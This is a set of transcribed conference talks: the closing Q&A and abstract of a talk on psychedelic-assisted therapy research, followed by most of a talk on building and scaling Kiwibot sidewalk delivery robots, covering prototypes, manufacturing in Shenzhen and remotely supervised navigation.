knows what they're dealing with, because otherwise you can do yourself more harm than good. This picture down there with the ambulance is a real picture. Right. That's what I wanted to say. Thank you very much for having me. If you're interested in what we're doing, check it out. APPLAUSE Andrea, thank you very much. That gives us plenty of time for some questions. People are lining up on the microphones already, so we start with microphone number two, please. Hi. Thank you for this amazing talk. That's really great. Just one question. Wouldn't that be a problem for a double blind study? A person can surely tell if they're experiencing psychedelic effects. That is a problem, yes. But this is the way the authorities request a study to be done. And interestingly enough, there have been cases where people couldn't tell. People thought they were either on a small dosage or on a thought they were on the high dosage, even though they were on an inactive placebo. So the self... Self-suggestive capabilities of people should not be underestimated either. OK, then we're going to jump over to number six. Thank you very much for the talk. I would like to hear your opinion on the fact that, like in the last 150 years, most drug agents were discovered in Germany, and meanwhile we have the pity of scientifically Germany lying in Arizona. Right. Germany has two points that historically hold us back. One is the forced human trials during the Nazi era, where substances, techniques were tested on concentration camps, prisoners, and we have the Contagane scandal that harmed so many people and led to, in all of the world, the stricter rules we have now. That's two reasons why Germany is so reluctant to expose itself in this kind of process. But still, it is a pity, and I think it is about time that the German, not only government, but also the scientific establishment, gets to understand that they lose out, and they're trading behind a development that has started and will continue. And now we have a question from the internet, I hear. Yes, for people struggling with depression, anxiety, or mental illnesses, what specific options are there in Europe with regards to psychedelic assisted therapy? One is that you can try to participate in the existing trials. For example, in London there's King's College, Imperial College, there's a group in Bristol working, there's also therapy happening in Switzerland, and so on. And there's also, if you happen to be lucky enough to live in Switzerland, there's the so-called compassionate use, where psychiatrists with special permits are allowed to use LSD and MDMA as therapeutic agents on a case-to-case basis that they have to discuss with the authorities. So that's all we can say for now. Study participation or compassionate use, and we just really hope that things will rev up and we'll be able to offer more in the future. And microphone number four, please. Yeah, hello. Thank you very much for your talk. My question is more related to the history of the uses of psychedelics in the West and to the MAPS Association founded by Rick Doblin. But I was curious, how would you explain that MAPS is so actively criticizing the experiments led in the 1950s and 60s by the CIA, and yet they accept donations of several million dollars coming from the Mercer family who are among the largest shareholders of Cambridge Analytica, Breitbart News, and they also accept that recently about three millions from members of Tea Party. Isn't it a bit of an irony here? That is a very good question. The way I know Rick Doblin and many people from MAPS personally, I know that they're pursuing an honest goal. What they're trying to do is bring this into the world. They have been doing that since 1986. So they've been on this for almost 35 years and he's dedicated his life to doing that. I don't fully understand his motives. I don't have to, to be honest, because I'm not speaking for him. I think there is a huge necessity for integrity, because if we don't, as people working with us scientifically, if we don't move along with the necessary integrity, we're opening the doors for other people to don't care at all. But on the other hand, finding the money, getting this done, and a lot of, Rick was criticized a lot, for example, for accepting veterans, snipers from Iraq into his therapy program. Like, okay, are you not getting people fit again to go out back to the battlefield? And I find this all very difficult, because there is a thing that is called perpetrated PTSD. There is a thing of people only realizing afterwards what they have done. And I would not, I would be very careful in judging people in distress. But you're very right. It's a very delicate topic, and I think we all have to be very aware that there are thin paths as we are threading in what we're doing there, when we accept money that comes from sources that don't follow ethical standards. Then we're going to switch over to microphone number five. Hello. I guess you have a really nice answer to the following statement. So I hope you will share your answer. Little Greta Twitter today that the house is on fire, and just that. So actually that means an adequate reaction would be to jump out of the window. So you could argue that actually we should rescue all the people that are really down, like down and out, because they cannot help us anymore. But actually we should get the people that are still happy to be able to breath instead of all getting them happy. What do you say? There's always two ways of dealing with the system. You can step out of it, and you can try to change it from within. It is always very difficult to go from caring for the individual to things that are right for all. And me being a doctor, for example, I have simply decided to put the individual in the center of my concern, and I think others need to put the greater good in the center of their concern. I think it's inconsolable. We can't do both at the same time. So I think it's important to make a decision and do this what you do with all your heart. Then we're going to switch over to the internet again. Yes. Do you know of any studies or evidence corroborating the other side, like triggering mental illnesses by using psychedelics, for example, if you have a family history or... Well, doing a randomized control study with that would be unethical. What we have is the epidemiological and the anecdotal evidence that is found. So yes, if you have a predisposition for psychosis, for schizophrenia, for mental instability, there is a large chance of triggering that if you use psychedelics. But on the other hand, many people try to self-medicate with substances, be it psychedelics or cannabis, because they're feeling they're already on the edge of some instability. But the current paradigm for the studies is to exclude people whose direct family is affected by psychosis. Number two, just disappeared, so we're going to go straight over to four. I would like to ask you whether you changed your mind about anything related to psychedelics in the last few years, or if you have seen something in research that really surprised you. Well, I am worried in a few respects. For example, the whole development around the five-meo scene, people using Bufa Avaria's toxin for very, very strong... like they experience, sometimes risking their life doing it. This whole scene kind of lifting from the ground and going in a very strange direction, in my opinion. This is kind of worrying me, because I think people are not taking the care they should be taking of themselves in what they're doing. But otherwise, I think scientific results we're seeing are rather consistent. It's very important to know that these are not magic bullets, they don't expect too much. You can't expect something to cure everything. Psychedelics seem to be a good idea for people who are rigid, to not be able to transcend something, but people who are already in a chaotic state are very unlikely to benefit. I think that's a very good basic rule, and this is something I see proven time and time again. Number five, please. Hi, thanks. Regarding set and setting and how it can have such a huge influence and experience, can you comment on the setting of the new psilocybin study in the upcoming year? Like all the studies that are being done, set and setting are being taken into consideration. These people don't trip in a sterile white hospital bed. They get to have their psychedelic experience in a warm, comfortable, organic, welcoming environment. For example, on a couch with a nice cushion, nice dim light, flowers, music is extremely important. There have been really scientific works around what kind of music is beneficial for this. Mendel-Caitlin, for example, at Imperial College, is a specialist in this kind of music. It's being taken very seriously. Also, those questions of how much physical contact is beneficial, is allowed, what could harm the patient, is discussed very precisely in all those groups I know, because this is so much more than just a pill. This is really about making sure that people have a safe experience where they can come to healing inside themselves. Thank you. So we have time for one more question. Number one, please. I don't know if I want to hear the answer, but do you think it would help your cause if we would stop taking these drugs for fun? My answer to this is the following. Imagine there was a food thing, something that tasted nice. Let's say chocolate. And there were people who could only survive if they got chocolate, but because everybody else was doing it too and was somehow not okay, it would be forbidden for everybody. Then I would say, well, if you replace chocolate with LSD, I think there are people there who really need it, and we have to be careful that recreational use and playing around with drugs doesn't spoil their chance to something life-saving, because they need the chocolate. You might get along without. But it's something we have to take into consideration. And this doesn't mean it's wrong to have, like, experience for your own benefit, for your own betterment, for your own fun. But just keep in mind, if you're hindering with your wanting to have a good time, that somebody gets a life-saving therapy, perhaps, then this is an ethical problem we are facing. Andrea, thank you so much. That's your applause. Thank you.
Psychedelic research constitutes a challenge to the current paradigm of mental healthcare. But what makes it so different? And will it be able to meet the high expectations it is facing? This talk will provide a concise answer. Psychedelic Therapy is evolving to be a game changer in mental healthcare. Where classical antidepressants and therapies e.g. for Posttraumatic Stress Disorder often have failed to provide relief, substance assisted psychotherapies with Psilocybin, LSD and MDMA show promising results in the ongoing clinical trials worldwide. A challenge to the current paradigm: Unlike the conventional approach of medicating patients with antidepressants and other psychotropic drugs on a daily basis for months and years at a time, Psychedelic Therapy offers single applications of psychedelics or emotionally opening substances such as Psilocybin, LSD and MDMA within the course of a limited number of therapeutic sessions. The clinical trials conducted in this kind of setting are currently designed around depression, substance abuse, anxiety and depression due to life threatening illnesses, PTSD, anorexia and social anxiety in Autism. Though the results look promising, it is important not to take these therapies for a “magic bullet cure” for all and very patient will mental issues. This talk will outline the principles of psychedelic therapy and research and provide a concise overview of what psychedelic therapy can and cannot offer in the future.
10.5446/53197 (DOI)
So Sasha is an attacker with a weak spot for LEDs and completely abstains from HDMI adapters these days. He wanted to share with us the experience of attempting to build delivery robots in the past 2.5 years in the Bay Area. And so, yeah, let's give him a big welcome. Thank you, Mikhail. So just to show of hands, who here has built robots before? Oh, that's quite a few people. What about autonomous robots? Did he build autonomous robots? Still quite a few people. Well, today, I'm going to be sharing with you the story of how not to build autonomous robots. Over the course of the past 2.5 years, together with my team, we built the world's largest robotic delivery infrastructure. We went from a concept sketch to a commercially viable service running in three cities. We've had lots of successes and one or two failures. So over the course of the next 45 minutes, I'm going to be sharing with you a couple of different stories. First of all, I'm going to briefly introduce myself. Then I'm going to share the story of how we built robots, the different prototypes we had, the different iterations that we tried. I'm going to jump on manufacturing. We actually went to China and scaled up our manufacturing and production line. I'm going to share with you the story of how we did that. Finally, I'm going to talk about AI and all the magic that is artificial intelligence. So we'll be able to see how we were able to crack that puzzle. So without further ado, let's do the introduction. This is me. Hello, dear. I like to build things. I built my first website when I was 11 and I built my first business when I was 13. It was an iPhone repair business that I was running out of my bedroom. I've been really, really passionate about building things. And over the course of many years, I built a couple of different startups. One of them was a food delivery platform. We ended up running three different cities and doing hundreds of deliveries a day by the time I was 19. So I got to experience startups pretty early on. I've been really enjoying that time. After this food delivery start failed, I went to some cryptocurrency startups and then went to work for big corporations. And that was actually very boring. I'd doored my office with some supplementary graphics. After a while, I got a little bit bored of this corporate life. It wasn't really for me. So I decided to get a one-way ticket to San Francisco. So I ended up in San Francisco staying on a friend's couch, not really knowing anybody. And I was really fortunate to be introduced to an incredible group of people. And over the course of about two and a half years, we started to take a concept, a sketch that we had, and we built up a robot. At first, it was something that barely even worked. But then we gradually got to something that worked a little bit better and better and better. After a while, we actually managed to build a whole fleet of robots. I think at the peak, we had 150 robots. So it was a really, really cool experience. And during that time, I got to meet the Lieutenant Governor of California, got to figure out how to do manufacturing in China, and most importantly, work with an incredible team, who had a lot of fun with building these robots. So yeah, that's a little bit about me and what we were building. And maybe now we can jump into how not to build robots. So those are our very first robots. This is a really small prototype we built. It was basically a shopping basket on wheels. There's an RC car there below. There's a shopping basket and there's Arduino Raspberry Pi. It didn't barely work, honestly. It was really, really hacky. And what ended up happening is that most of the time, we just dropped off the robot in front of the customer. It's like literally just like dropped it in front of the door just to see if they would like order food with robots. Bouncer was overwhelmingly yes, so we decided to spend some more time building out technology. There's a small, I don't know if you can see it here. Yeah, there you go. There's like a small orange holder. That's actually a phone holder. So our very first prototype, it had a phone sitting on top of it, doing a video call so that somebody can remotely control it from Columbia. So we really started off small, really humble, just to see if it would work. And that's something that we do a lot of, just being really resourceful in terms of trying out things. After about a year of this, we moved on to something that looks a little bit more like this. So we started playing around with the shape. We started playing around with the design. We noticed that people responded really positively to faces and to things that looked like people. So we actually built in a face. So we took this little animation that we built and we put it onto the robot. And this is actually really, really positive. We had a lot of good responses from the community, a lot of great feedback. And what we've seen is that people really love to have robots that are kind of friendly. There was another company that deployed robots that looked like vending machines or almost like tanks in San Francisco. And they got banned really, really quickly. So we decided that we would do our best to make sure our robots were as friendly as possible instead of threatening and scary. So that was a very important part of it. After another year, we ended up scaling up our production and we went to China to manufacture robots. And here, this is where we ended up here. It's actually a really cool robot. We built it entirely from scratch. We built it on chassis, our own cabin, our own compute module, the system, just about everything. It was a really cool experience. That was me. So yeah, that's a robot. This is the one we were rolling around the past six months. And we also had some failures in between, as you saw previously, this one. So we actually tried a couple of different concepts. So this was one of them. This was a Kiwi trike. We thought that maybe we can figure out how to have robots do part of the delivery and then trikes do another part of the delivery. We also tried to do restaurant robots. We had robots that are sitting in the restaurant and bring food out from the counter to your doorstep. But what ended up happening is that it was actually pretty inefficient and people would wait a really long time for their deliveries. So it was very important for us to try a lot of different things. We tried this robot, the Kiwi trike, that did not quite work out as we expected. We tried a restaurant robot. We tried a box that would sit behind our robot. We tried a hub that would have a bunch of different robots inside of it. So we really, really tried a lot. And with every iteration, we constantly tried new techniques. We constantly tried new manufacturing methods. We really tried just about everything to see if we could make it work. And what we ended up building is a platform that was really loved by people. We built a platform that students adored. It was our primary demographic. We were delivering to college campuses. And students really loved our products. We actually had people dressed up as Halloween costumes. We had entire classes go for Halloween and the Kiwi Bar costumes. So it was really, really cool stuff. It had a lot of great support, a lot of trust from the community as well. And that's like coming back to the design, that aspect of having a friendly robot that mesh seamlessly within the fabric of a community is like super, super important. We've seen other robots around and they were maybe not as friendly. Maybe they looked a little scary. Maybe they had something that was a bit off or maybe a little too industrial. But having a friendly robot that could become a meme, that was something truly revolutionary, something that really changed the landscape. And as a matter of fact, these Kiwi Bots are the only robots that are deployed somewhere in the world where they coexist day to day with the community, with people. You have some limited deployments of robots here and there. Maybe you have a room bed home or something like that. But you don't have any large-scale deployment where you have robots and people living in the same city all the time. So of course, it took us a while to figure out what to do and how to do it. At first, one of our models was to have robots deliver the entire meal. Like go from the restaurant all the way to the customer and we would have a robot do that delivery. It turns out it was pretty inefficient. People would wait like 60 minutes, 90 minutes for their delivery. And we realized that maybe automating all of that was not the most efficient approach. So what we instead did is a multi-model approach where we had people and robots. This is actually a really cool visualization that my team came up with. The blue lines are robots. So these are robots roaming around our Berkeley coverage area. And then the yellow lines are people. So how this would work is that people would go to restaurants, they'd pick up the food, and they'd take you to a cluster. So they'd take you to a cluster where you had a bunch of robots. They'd load it into the robot and then the robot would actually do the last few hundred meters to your doorstep. And because we were able to do this, we were able to go and build a platform that handled hundreds of orders a day with very, very few people. I mean, labor costs are really high for delivery. You would be paying somewhere between five and $13 to get a meal delivered in the US. And as a student, that's like super expensive. It's not something that you can afford to do every day. And also there is a pretty big shortage of people who want to do this job in the first place. The churn is really high. People are leaving all the time because they don't like to sit in the car all day and just deliver food. So that's why we have this parallel, this multimodal approach where people are biking around, they're enjoying their time outside, and the robots are actually doing all the boring stuff, like the waiting. So the robot would go up to your doorstep and it would wait for you to put on your pants, your shoes, and to actually walk outside. So that way we were able to change the dynamic. We were able to change our efficiency from one or two deliveries an hour, as you would have for a traditional delivery service, to as much as 15 deliveries an hour per person. So it made the delivery far more affordable and we were able to offer delivery at just $1 delivery, which is a cost that changes completely the way people approach delivery. And in fact, if we look at our top 20% of users, they were ordering over 14 times a week. So they were very, very happy that they could get whatever they wanted very quickly. Of course, not everybody was super happy. So we did have some people that didn't fully appreciate the magic that is the QE buy. So we did have one person try to steal it, but they didn't get away with it. We found them pretty quickly. And they hit it in the trunk. Not a very smart move. We ended up finding it with GPS and also triangulating the Wi-Fi. So this guy decided to steal it because he doesn't like robots. I don't know why, but he was clearly very passionate about that topic. And he stole it and now he's in jail. So yeah, don't steal robots. So maybe some conclusions from our robot part, like from building robots, from figuring out like what to do and what not to do. A really important thing that we do a lot in software, but maybe not as much in hardware, is iteration. Like, we iterated through three major revisions and like lots of small revisions during a really small period of time. It was really interesting to see like that transition. Every single time we tried something new, we tried maybe for like 20 robots at a time. Like not our whole fleet. We just tried for a small portion of our fleet. And that way we were able to iterate really quickly and see what sensors work, what cameras work, and just to see what we could do in order to grow the product. So it was very important to iterate. Communication. Communication is absolutely fundamental. And not only communication like inside the company or anything, but more importantly communication with your community. Because we weren't just building a product in isolation. We were building a product for people who live in a city who have an established life and we're kind of intruding into their life by bringing in a new product that takes their sidewalks. So communicating what we're doing, showing them what this is and what this robot does, is super important. And actually very early on, our designs had no text in it. They had like no information. It was just like a basket case on our C-car. And people were really confused. The police were like, hey, what is this? So we had to add a lot of communication. We had to put food delivery on the robots really clearly. We had to add a license plate with a phone number that somebody could reach out to us. So communication is very, very, very important when it comes to robots. Also scaling hardware is hard. Super hard. I mean, it was crazy. When we first started, it was just arduinos and Raspberry Pis. And that did not scale really well. Like sure, we could have maybe 10 or 20 units at once, but then how do you handle updates? How do you handle, I don't know, just weird things that happen all the time? So it was really challenging to do this. We actually killed a bunch of SD cards. Didn't really know you could destroy SD cards, but you can. And we learned a lot of things about hardware, pushing it beyond its normal boundaries. So yeah, iteration, super important. Communication is key. Like getting by from your community. And scaling hardware is super, super hard. That's something we actually figured out how to solve by going into China. So how to do or how not to do manufacturing. So as every China story goes, I hopped on a plane and I ended up in China. And it's really interesting to see because like you have this perception of China from the media. You have this idea of what it would look like. But the reality is it doesn't look anything like what you would expect. It was a completely different world. It was at the same time Blade Runner and like the most modern city in the world. And it was truly an awesome experience. I highly recommend anybody who has the opportunity to go in and explore the world. But of course, the culture is a little bit different. We were surprised to see some things happening there. It was a weird dichotomy between communism and consumerism. It was kind of interesting to see that sometimes. So the reason why we came to China is for manufacturing and there's no better place for that than Shenzhen. And Shenzhen you have Huasheng Bay. It's this huge market. It's a market that spans several city blocks. And you can actually find anything and everything you want. We were able to get components super quickly, super easily. And you can spend days just walking through a single building finding different things. There were entire city blocks dedicated to just LEDs or just connectors or just processors. It was absolutely crazy. You could really, really, really get lost inside of these mazes. And what was really incredible to see and something I've never seen anywhere else in the world is just how easy it is to get hardware, to get things, to get parts. It was super easy to just go in and get something. And you could get it at one piece, two pieces, or a thousand pieces instantly. And if you're anywhere else in the world, that's super hard to do. So just by this virtue, you're actually able to prototype things. You're able to build things incredibly fast. You're able to go in. You're able to commission a PCB and get all the parts almost instantly, which is not something you see anywhere else in the world. And also a lot of the manufacturers have their booths here. So these would be direct booths from the manufacturers. You can go up to them, start talking to them, and ask, hey, can you make this product this specific way? Can you do it how I want it? And they'll be like, sure, why not? And they'll do it for you. So it was really, really valuable to just learn from these people, from the vendors here, from the manufacturers about how to build things. And it was actually really surprising to see everything they have in stock. Two years ago, we built an oscillation here that covered a tunnel with LEDs. Covered one of the tunnels at 343 LEDs. And we used this tiny, tiny chip. It was a $5 ESP266 chip that basically was able to control all your LEDs. And over the course of five years, up to that point, I spent a lot of time figuring out how to build it myself. I played with Raspberry Pi. I played with PCA controllers, over Serial. And I finally managed to get a prototype to work. But it was super clunky, super expensive, and it wasn't very reliable. Then I go to China, and I find that it's available there in much better quality, much cheaper, much faster. So it was a really, really interesting shift in perspective. It's something you can't appreciate when you're abroad. Even if you're browsing like eBay or AliExpress, it's kind of hard to appreciate just how much selection you have and how you can find just about any tool, anything you need to find. So it's really, really incredible. But these markets are cool. But what was even cooler are the factories. And during our course in China, we were able to visit a lot of factories. All these factories, they were super, super welcoming. They always loved having you over. They invited you to really, really luxurious dinners where you have way too much food. And it was a feast and celebration every time. Actually, relationships are super, super important in China. A lot of people in the West, they have contracts, and they say, OK, this is the terms of the contracts. Well, in China, you do sort of have contracts, but they don't matter as much as relationships. When you have a relationship with a manufacturer, you have to always go to dinner with them, drink beer, smoke, go to KTV. It's a really involved relationship, and you're only able to have good communication based on that relationship. Because if you don't have a relationship, they kind of forget about you. And we actually had a couple of instances where manufacturers ghosted us. They had a critical component, and they just stopped answering our emails. They stopped answering our WeChat. They just completely ignored us. And for some pieces, they were completely irreplaceable. Like, we could not just go out and find another factory to produce a specific part the way we wanted. And the only way you can ensure that this doesn't happen is by really explicitly making sure that you have good communication, a good relationship with that manufacturer. So it's super, super important. This is one of the factories we worked with. It's really crazy. I mean, we went there and we were just absolutely blown away by the scale of everything, and also blown away by how manual everything is. There's actually audio here. Everything was super manual. People were just like there with minimal or no protective equipment whatsoever, just like building things that looked like they were made by robots or machines, but they were in reality just built by people with the hands, which is super crazy to see. And there were a lot of Blade Runner-esque designs, really bizarre contraptions there in this factory. This is our fiberglass factory. The way we built our case casing, sorry, was actually prototyping it first in fiberglass, and then moving on to a mold in carbon fiber. And actually Scotty, he made a really cool video on YouTube. So if you search for Hockey Stick Factory on YouTube, you can see a huge video where my buddy Scotty actually goes with me to this factory to discover how they make this mold and how they make these carbon fiber things. It was actually really crazy to see. It was cheaper to make a carbon fiber mold than was to make a plastic mold. So since the tolerances were a little bit different, since the process was a little bit simpler, you were able to make a mold that was very, very strong and very indestructible without necessarily having to have all of that expense up front for a plastic mold. So yeah, that was our fiberglass factory. Really exciting stuff, really crazy scale. These folks, the first night we came there, we arrived at 8 p.m. and there was 100 people in the factory just working at 8 p.m. It was really crazy to see. This is another factory we worked with. So this was a metal factory. It was actually really, really, really interesting to see how they built all these things. At one hand you can build super complex things. You can build super complex designs. But on the other hand, we got surprised a couple of times by being unable to manufacture really simple designs. And it took us a while to get a grasp of like, oh, okay, so we can make really complex metal that's bent, but as soon as we add a weld to aluminum, you start to have a big, big problem. So we had to change a lot of our designs. We had to really adapt to the way things were being made in China. You could adapt yourself at the same cost, so it was better to adapt to the way things were being done there. So again, very, very interesting to see how things are done. No protective equipment. This is like a two ton press and his hands are millimeters away from it. So yeah, it's a different world out there. Very, very different. Another factory we visited was a PCB factory. So this one actually has a really interesting story. This factory is not in Shenzhen. It's just across the border from Shenzhen. The city actually passed a law a couple of years ago that has very, very strict environmental policies. So you're no longer able to do PCB manufacturing inside the city anymore. So we actually had to drive for a couple of hours outside of the city and over there was a huge plant. And this plant was kind of semi automated, semi handmade, sorry, where parts of the process were done by hand as you see here, but then parts of the process were done with the machine. So they had this giant machine, which is basically like a black box you can't really see inside of it, but you had a bunch of chemicals and just like take a PCB and just like move it forward through a chain. So it's really interesting to see. And this factory also had a really quick turnaround. They had a three hour turnaround. If you paid a premium and like standard, it was 24 hours. You could also ask them to do PCBA so you can actually get them to assemble the PCB for you. And we ended up doing that for some of our PCBs. We'd like give them a bill of materials and we'd give them our designs and then the machine manufacture it. We actually got in a little bit of a situation with that because we sent them some designs, we sent them some parts that we wanted to put in our PCB. And it turns out that one of these parts was unavailable and they didn't tell that to us until it was almost Chinese New Year. So we had to scramble a little bit to find another solution. It was very interesting to see how you would deal with these factories. There were some even cooler factories. I think the coolest factory I visited was a battery factory where they made lithium ion and lithium polymer batteries. It was almost entirely automated. You had giant films of things going into a machine and then you had all sorts of liquids and powders that was combined together. It was super, super cool. It didn't allow us to film it, unfortunately. There were maybe only a dozen such factories in the world so they're very protective about their technology. But the scale of how quickly they're manufacturing these batteries was just incredible. They were manufacturing them at a crazy, crazy scale. So all these factories are cool but actually building things is even cooler. So we ended up partnering with a contract manufacturer. I was really fortunate to find one through my network. Otherwise I would have been totally lost. A couple of days before I ended up going to China, I found a contract manufacturer that liked to work with startups with small scale people and we ended up working with them to build our first batch of 50 robots. It was really interesting to see how different our designs were to what they expected. So they expected things are really ready. They were very explicit, very clearly specified. But we didn't have that. The difference between manufacturing in the US, for example, against China is that in the US, it's a super long process and the back and forth takes super long just to get an idea of what kind of files they need. Whereas in China, you're able to sit down directly with the engineer, with the person in charge and you can figure out what they need and they can help you out instantly. Actually, just here, I just want to show you one thing. So this is my designer, Alejandro, and he was translating from English to Chinese with his phone with a Google translate. And it works surprisingly well. Google translate actually is not blocked in China for some reason. We were able to communicate almost all the time with that. Also WeChat has a built in translate feature. So WeChat is this universal app that everyone in China uses and has this built in translation feature that can translate your text automatically. So it was really, really cool to see how that worked. One question that we get commonly asked is how do we find our manufacturers? How do we build these relationships? So about 20% of that was Alibaba. So our fiberglass manufacturer, we quoted like 30 different manufacturers and went with the cheapest one. Of course, it was far more expensive than we expected. And we ended up working with them. 20% like for example, our chassis, it was built with companies that we already had a relationship with. So we were just able to continue working with them. And then 60% was through just references. So just like the network, just getting to know people and talking to them and saying, oh, hey, who did you use for this or this or like, how did you make these PCBs? Or just getting a conversation going. So having that kind of network was really, really helpful in order to build these robots. So as you can actually see over here, our design, this is what we had when we came into China. When we left, we had our own compute module like super sophisticated, but this was like a Raspberry Pi, a PIXHawk, and a voltage converter, like a DC to DC converter. That was pretty much it. As you can see, it's not very reliable. It would break a lot. So it took us quite a while to translate this into something that was manufacturable. So thanks to the dedication of my incredible team that we were able to do that. And we kind of did not know what we were doing. So we ended up having all of our parts and all of the components ready just days before Chinese New Year. So we actually had to do all of the assembly ourselves. We didn't have any Chinese workers who could help us do it. So this is our team just assembling things in the factory, maybe like one or two days before Chinese New Year. So that was very, very interesting. We kind of hacked or tried to hack Chinese New Year. We assembled all of our robots literally days of no hours before Chinese New Year. And we shipped them out and everything was great. Except our robots got stuck in customs. We had a trademark on our box. And the customs agents, they opened the box and they saw more trademarks on some parts. We had three printed parts. And they're like, no, this is not going to go through without the proper paperwork. So our robots got stuck for three weeks in China, which was really fun, a little problematic. So yeah, those kind of things happen. You have to be ready for it. After we received our robots in California, we had to spend another like maybe one or two months refinishing them, redoing some parts, tweaking them, flashing them. So it was still a lot of work to get them to work. The pieces we shipped out of China was maybe just like a case with most of the electronics in it, but not all of it. So we still have to do a lot of tweaking over back home. And of course, all this wouldn't have been possible without an incredible team. So I was really fortunate to be with some really, really passionate people, some people who would work four months in a row continuously without virtually taking any breaks. We had plenty of opportunities to go and take the high-speed rail, go to Shanghai or even Tokyo. But we all stayed in Shenzhen and spent a lot of time together building these robots. So it was a really, really arduous journey. So maybe some conclusions for scaling manufacturing, some of the failures we've had in relationships. I mean, relationships are super important. They're like super, super important in China. Far more important than contracts, if you're able to have a good line of communication with your manufacturer, that really, really helps out. Because if you don't, things don't go bad. We've had manufacturers that go to us. We have manufacturers that completely ignore us, or manufacturers that just replace components because they just felt like it. So relationships are super important. Don't hack Chinese New Year. We tried it. It doesn't work. It's a thing. China just shuts down for like two or three weeks. So it's really, really important to respect that. People buy tickets to go to their hometowns like months in advance, and they're not going to move it for just like some pesky thing that you're building, especially if it's like some small scale thing. So yeah, don't try to hack Chinese New Year. It did not work out well for us. Also doing with the team. While I was in China, I saw a couple of sole entrepreneurs try to build their own thing, and it was super, super hard, super stressful. Having a team is really great, especially if like a foreign place where you don't really know anybody, having that team there together to support you is super, super important, especially since you're kind of multitasking, you can like split responsibilities and do something together. So it's a really, really important aspect. So that's how we manufactured some of the failures we've had. Now let's talk about how not to build AI. So as we all know, AI is magic, right? Just as blockchain and IoT in the cloud, it's absolutely magic, right? Well, the reality is it's not that magic. So we decided to have a very pragmatic approach to AI. We said, let's not do anything crazy. Let's just make something that works. So our very first iteration of our robot was this. This is like the control panel for a robot. It was super simple. We had a video call coming in from the robot on the left over there. It was like literally an iframe, super simple stuff. And on the right, we had a map. On the bottom, we had some controls so you can move the robot forwards, backwards. It was very, very simple. It barely worked. On the robot, we had an Arduino, a Raspberry Pi, all running like in Python, and then the server was Java, communicating over a WebSockets. But this barely worked. So we decided, okay, what can we do? Maybe we can build an autonomous robot. Maybe we can build something that would work entirely by itself. We actually did that. So we built a robot that could go entirely by itself. It was fully autonomous. And it was actually really cool. Maybe we built it is we had a pretty beefy computer inside. We had NVIDIA jets and TX2. On that, we were running ROS. Inside of ROS, we were running TensorFlow and a couple of other technologies. We had YOLO for object detection and some other cool tech that I'm not entirely familiar with since I didn't write that code. But over here, what the robot did is it looked at objects. So it was detecting objects. It was also measuring the distance to the objects. And it also had an inference neural network. And you can see that on the top left of the screen here. Basically based on trained data, it would know where not to drive into. And it would try to plot a path based on 12 different directions it could go into. So it had 12 directions. And it would go in the direction which had the highest probability of not colliding with somebody or something. And this worked okay. We were able to get like 99% autonomy. But the problem is like since we're doing a commercially viable delivery service that's like offering deliveries to regular people and it's not doing something in the lab, really had to do something that worked all the time. And the challenge with this is we still need to have people in the loop. We still have to have people who looked at the robot to make sure it would actually not crash. And what happens if you have something that's fully autonomous and people assume it works well, when it doesn't work well, instead of looking at the screen and being ready to take over, they're just looking at their phone and Instagram. So this approach wasn't the best one and instead we decided to use supervision approach. So we spent a lot of time building this. So this is our supervisors console and it's actually a really, really cool platform. It's a platform that allows you to connect to a robot and the robot streams to you video over WebRTC over like the 4G network and you're able to control it over WebSockets. So the way it would work is you would have a supervisor that sets way points for the robot to follow. So the supervisor would just click on the image and he or she would tell the robot to move 10 meters at a time. So typically it sets way points every 5 to 10 seconds. It was a very interesting approach. We tried a couple of different approaches. We tried to do SLAM. That really did not work out for us. It took too much resources and it didn't give us a significant gain. We tried other things as well. We tried traffic light detection. So we tried traffic light detection. There are some amazing models available online, some great GitHub repos. The problem is, yes, they do work on a very clean data set, but when you actually have data, we actually have a real life scenario where you have like glare, you have rain, you have weird situations, you have homeless people, like it doesn't really translate that well in the real world. So we kind of struggled with that. Instead, we actually had a more middle ground approach. So we are able to detect traffic lights really well, but we're not able to detect the color really well, which kind of signal it's giving. So instead of what we do over here, this automatically zooms in to traffic light, so it's very easy to see. This video actually that you're seeing is transmitted over a very low frame rate, very low bit rate as well. I think we're doing 480p at 100 kilobits a second. So it's very, very low bit rate. And when the robot isn't moving, we actually make it go black and white and even lower frame rates so that it doesn't waste resources. So yeah, it's pretty cool stuff. Over here on the top left, we actually have our latencies. So we managed to build the infrastructure that allowed us to supervise these robots from Columbia for like 200 milliseconds, less than 200 milliseconds. So it's like a blink of an eye. It was a really, really cool technology. It worked over 4G, and we did a lot to optimize that. We had also a map over here. So this map is really, really cool. A lot of people ask us, like, hey, did you do mapping? Did you map out your environment? Did you need to have something there before you came into a new place? And the answer is no. But what we do instead is we actually map out the network conditions. So we would map out the network conditions of a city, and we would say, okay, these areas like over here, this is like high latency, we should avoid those areas because the robot could get stuck there. And it's actually very interesting to see the network conditions change continuously. Like you didn't have the same network conditions every day, all day, all year. They'd actually change every few hours. So it was something that took us a while to figure out. So of course, the way this worked is we had two or three people supervising, sorry, two or three robots per supervisor in Columbia, and we had like just a bunch of people, typically students who would just be working part-time, and they were sitting in an office in Columbia doing this. Of course, the press found out about this, and they wrote a very small bit of text in this article saying, like, oh, Kiwi hires Colombians and pays them $2 an hour. And people were really frustrated about that. We had a lot of interesting feedback about that. But what was interesting to see is that this technology actually helps people in Columbia. If you're there, it's a third world country, it's a developing country. You can get a job at a factory, you can get a job at like a textile shop, you can get a job maybe McDonald's, but there aren't that many tech jobs per se. The biggest employer in the country is a phone support company. So like when you call in to support land, support line, you get connected to Columbia sometimes, and that's the biggest employer in the country. So in order to get like a tech job, it's really, really hard. And giving people the ability to like go and supervise robots, it's something that helped them get something on their CV, it helped them step up, it helped them learn a little bit more about the technology and helped them progress in terms of their careers. Our lead AI guy, he actually started off as a supervisor and he went up through ranks and then he ended up leading the AI and robotics team. So it was really interesting and really inspiring to see how that transition happened. And we managed to get our technology to work so well that we can do this. So we were able to get it to work with up to eight seconds latency, which meant that you can control it literally from anywhere in the world, so even from like an airplane above the Pacific Ocean. So it was a really, really interesting experience and we really try to make it simple. So in conclusion, for AI, we realized that the best approach was to keep it simple. We tried a lot of different approaches. Like we tried the traffic light detection, we tried yellow pad detection, so I didn't mention that. So in Berkeley, you have these accessibility ramps and you have yellow pads so that blind people can actually like feel them and see them easier. So we built the algorithms to detect that and we thought that, okay, maybe if the robot is stuck in the middle of an intersection, it can automatically detect this yellow pad and like navigate to it. It's an approach that worked in theory and practice did not quite work. We tried segmentation. So that was an approach that worked okay, but some weird things broke it. So for example, any lamp posts or bicycle posts that would like crash the robot because it didn't see it. So yeah, keeping it simple was the best approach. Really not going too crazy. The approach we 